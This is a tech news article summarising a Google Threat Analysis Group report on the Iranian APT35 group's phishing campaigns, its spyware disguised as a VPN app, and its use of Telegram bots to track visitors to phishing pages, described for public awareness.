IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

Iranian hacking group continues to target US citizens

APT35 used phishing attacks and uploaded spyware onto Google Play Store

An Iranian hacking group has been targeting US citizens and organizations since 2017 and doesn’t seem to be letting up, according to a new Google report.

Google's Threat Analysis Group said a state-backed Iranian group known as APT35 targeted high-value individuals in the US and elsewhere. The hackers, also known as Charming Kitten, Phosphorus, Ajax Security, and NewsBeef, have attacked high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security since 2017. 

APT35 is also one of the groups that tried to disrupt the 2020 US election cycle by targeting campaign staffers. 

The group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government, according to Google TAG team member Ajax Bash.

Earlier this year, the hackers compromised a website affiliated with a UK university to host a phishing kit.

“Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo. Users were instructed to activate an invitation to a (fake) webinar by logging in. The phishing kit will also ask for second-factor authentication codes sent to devices,” said Bash.

Bash added that credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – “as they know it's difficult for users to detect this kind of attack”.

In May 2020, the team discovered that APT35 attempted to upload spyware to the Google Play Store. The app disguised itself as VPN software, but it could steal sensitive information such as call logs, text messages, contacts, and location data from devices if installed.

“Google detected the app quickly and removed it from the Play Store before any users had a chance to install it. Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021,” said Bash.

Among the most notable attacks by the Iranian hackers was the impersonation of conference officials to conduct phishing attacks. “Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond. When they did, attackers sent them phishing links in follow-on correspondence,” said Bash.

Related Resource

HP Wolf Security: Threat insights report

Equipping security teams with the knowledge to combat emerging threats

Skyscrapers from belowFree download

The hackers also used Telegram for operator notifications. The attackers embed JavaScript into phishing pages that notify them when the page has been loaded. They use the Telegram API sendMessage function to send the notification, which lets anyone use a Telegram bot to send a message to a public channel.

“The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram, and they have taken action to remove it,” said Bash.

This year, Google has warned over 50,000 account holders they may have been targeted by state-backed attempts to hack them using phishing or malware, a nearly 33% increase from this time in 2020. 

Featured Resources

Four strategies for building a hybrid workplace that works

All indications are that the future of work is hybrid, if it's not here already

Free webinar

The digital marketer’s guide to contextual insights and trends

How to use contextual intelligence to uncover new insights and inform strategies

Free Download

Ransomware and Microsoft 365 for business

What you need to know about reducing ransomware risk

Free Download

Building a modern strategy for analytics and machine learning success

Turning into business value

Free Download

Recommended

Google offers UK SMBs £87,000 scholarships to boost tech skills
Careers & training

Google offers UK SMBs £87,000 scholarships to boost tech skills

10 May 2022
Google Cloud confirms it is building a dedicated team to support Web3 developers
Cloud

Google Cloud confirms it is building a dedicated team to support Web3 developers

9 May 2022
Apple, Google, Microsoft expand their support for password-less sign-ins
cyber security

Apple, Google, Microsoft expand their support for password-less sign-ins

6 May 2022
YouTube Go to be shut down from August
streaming

YouTube Go to be shut down from August

6 May 2022

Most Popular

Windows Server admins say latest Patch Tuesday broke authentication policies
Server & storage

Windows Server admins say latest Patch Tuesday broke authentication policies

12 May 2022
16 ways to speed up your laptop
Laptops

16 ways to speed up your laptop

13 May 2022
How full-stack observability can accelerate IT innovation
Sponsored

How full-stack observability can accelerate IT innovation

3 May 2022